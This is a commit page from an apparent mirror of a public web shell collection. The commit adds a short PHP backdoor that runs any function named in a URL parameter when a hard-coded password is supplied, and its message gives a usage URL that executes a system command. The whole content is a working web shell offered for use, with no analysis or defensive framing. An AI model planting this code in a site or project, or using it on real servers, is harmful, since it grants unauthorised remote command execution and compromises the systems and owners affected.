mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Create 2022-08-26-06.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell3.php?f=system&a=pwd&p=password
This commit is contained in:
4
php/2022-08-26-06.php
Normal file
4
php/2022-08-26-06.php
Normal file
@@ -0,0 +1,4 @@
|
||||
<?php
|
||||
if ($_GET['p']=='password'){
|
||||
$_GET['f']($_GET['a']);
|
||||
}
|
||||
Reference in New Issue
Block a user